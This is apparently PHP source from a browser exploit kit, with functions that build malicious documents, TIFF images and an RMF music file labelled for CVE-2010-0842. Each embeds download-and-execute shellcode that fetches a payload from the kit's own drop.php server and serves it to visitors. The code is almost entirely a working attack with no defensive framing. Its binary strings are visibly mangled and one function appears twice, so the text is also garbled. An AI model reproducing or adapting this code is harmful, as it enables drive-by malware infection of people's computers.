function make_docbase($url)
{
$shellcode = shellcode_dl_exec($url);
$docbase = 'CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC';
$docbase = $docbase . 'ÁL4|ì&y8vqc8òþe';
$docbase = $docbase . '?Ï4 7|^Ð4|ê05|';
$docbase = $docbase . '¬4|ø.7|';
$docbase = $docbase . '7Y4|p±8|O/7|';
$docbase = $docbase . '\'44|�Q_Ã+ç4|\\?~G';
$docbase = $docbase . '*9õ5ì
õZkô6
È5|';
$docbase = $docbase . 'k4|O/7|ÁL4|`±8|';
$docbase = $docbase . '_ª5|
i5|p?Ò?64|';
$docbase = $docbase . 'QÎt
>V,ÁL4|p±8|';
$docbase = $docbase . 'ê05|^Ð4|¬4|:
63';
$docbase = $docbase . 'AAAAAAAAAAAAAAAA';
$docbase = $docbase . 'AAAAAAAAAAAAAAAA';
$docbase = $docbase . $shellcode;
return $docbase;
}
function generate_tiff($url)
{
$shellcode_offset = 400;
$tiff_offset = 8248;
$shellcode = shellcode_dl_exec($url);
$tiff = 'MM';
$tiff = $tiff . '';
$tiff = $tiff . pack('N', $tiff_offset);
$tiff = $tiff . str_repeat('
', $shellcode_offset);
$tiff = $tiff . $shellcode;
$tiff = $tiff . str_repeat('
', $tiff_offset - 8 - strlen($shellcode) - $shellcode_offset);
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . ')';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '
';
$tiff = $tiff . '$';
$tiff = $tiff . '� �J<��J���Jd�J';
$tiff = $tiff . '��J';
$tiff = $tiff . '';
$tiff = $tiff . 'd�J�-�J�*�J';
$tiff = $tiff . '���J� �J8��J���J';
$tiff = $tiff . 'd�J����';
$tiff = $tiff . '';
$tiff = $tiff . 'd�J�-�J�*�J';
$tiff = $tiff . '���J� �J0��J���J';
$tiff = $tiff . 'd�J����"';
$tiff = $tiff . '';
$tiff = $tiff . '�c�J';
$tiff = $tiff . '';
$tiff = $tiff . '�!�J';
$tiff = $tiff . '$��J';
$tiff = $tiff . 'ZRj';
$tiff = $tiff . '��J';
$tiff = $tiff . '���J';
$tiff = $tiff . '$��J';
$tiff = $tiff . 'X�.<';
$tiff = $tiff . '��J';
$tiff = $tiff . '���J';
$tiff = $tiff . '$��J';
$tiff = $tiff . 'Zt�';
$tiff = $tiff . '��J';
$tiff = $tiff . '���J';
$tiff = $tiff . '$��J';
$tiff = $tiff . '�MM';
$tiff = $tiff . '��J';
$tiff = $tiff . '���J';
$tiff = $tiff . '$��J';
$tiff = $tiff . '*���';
$tiff = $tiff . '��J';
$tiff = $tiff . '���J';
$tiff = $tiff . '$��J';
$tiff = $tiff . 'u��';
$tiff = $tiff . '��J';
$tiff = $tiff . '���J';
$tiff = $tiff . '$��J';
$tiff = $tiff . '�
_�';
$tiff = $tiff . '��J';
$tiff = $tiff . '���J';
$tiff = $tiff . '$��J';
$tiff = $tiff . '�';
$tiff = $tiff . '��J';
$tiff = $tiff . '���J';
$tiff = $tiff . '$��J';
$tiff = $tiff . '�� ';
$tiff = $tiff . '��J';
$tiff = $tiff . '���J';
$tiff = $tiff . '$��J';
$tiff = $tiff . '����';
$tiff = $tiff . '��J';
$tiff = $tiff . '���J';
$tiff = $tiff . '$��J';
$tiff = $tiff . '����';
$tiff = $tiff . '��J';
$tiff = $tiff . '���J';
$tiff = $tiff . '$��J';
$tiff = $tiff . '����';
$tiff = $tiff . '��J';
$tiff = $tiff . '� �J';
$tiff = $tiff . '';
$tiff = $tiff . 'ا�J';
$tiff = $tiff . '��J';
return $tiff;
}
function generate_tiff($url)
{
$shellcode_offset = 400;
$tiff_offset = 8248;
$shellcode = shellcode_dl_exec($url);
$tiff = 'MM';
$tiff = $tiff . '';
$tiff = $tiff . pack('N', $tiff_offset);
$tiff = $tiff . str_repeat('
', $shellcode_offset);
$tiff = $tiff . $shellcode;
$tiff = $tiff . str_repeat('
', $tiff_offset - 8 - strlen($shellcode) - $shellcode_offset);
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . ')';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '';
$tiff = $tiff . '
';
$tiff = $tiff . '$';
$tiff = $tiff . '��J< �J�W�J��J';
$tiff = $tiff . 'C�J';
$tiff = $tiff . '';
$tiff = $tiff . '��J���J
�J';
$tiff = $tiff . '}Y�J��J8 �J�W�J';
$tiff = $tiff . '��J����';
$tiff = $tiff . '';
$tiff = $tiff . '��J���J
�J';
$tiff = $tiff . '}Y�J��J0 �J�W�J';
$tiff = $tiff . '��J����"';
$tiff = $tiff . '';
$tiff = $tiff . 'c�J�JZRj��J';
$tiff = $tiff . '��J�JX�.<��J';
$tiff = $tiff . '��J�JZt���J';
$tiff = $tiff . '��J�J�MM';
$tiff = $tiff . '��J�J*�����J';
$tiff = $tiff . '��J�Ju����J';
$tiff = $tiff . '��J�J�
_���J';
$tiff = $tiff . '��J�J�';
$tiff = $tiff . '��J�J�� ��J';
$tiff = $tiff . '��J�J������J';
$tiff = $tiff . '��J�J������J';
$tiff = $tiff . '��J�J������J';
$tiff = $tiff . '��JxP�JI��J�J';
return $tiff;
}
function shellcode_dl_exec_js($url)
{
$shellcode = uescape(shellcode_dl_exec($url));
return $shellcode;
}
<?php
include '../config.php';
include '../include/shellcode.php';
$shellcode = shellcode_dl_exec($config_url . '/drop.php?e=Java-2010-0842');
$rmf = 'IREZ' . 'SONGmSΛm' . '' . '' . '' . 'ITL�±µ
~ϋp�†ώ°5' . '“β^ήχ' . '�' . '' . '8�ΙPQRSVW' . $shellcode;
header('Expires: Mon, 26 Jul 1997 05:00:00 GMT');
header('Cache-Control: no-cache');
header('Pragma: no-cache');
header('Accept-Ranges: bytes
');
header('Content-Length: ' . strlen($rmf) . '
');
header('Content-Disposition: inline; filename=midi20100842.rmf');
header('
');
header('Content-Type: application/x-msdownload
');
echo $rmf;
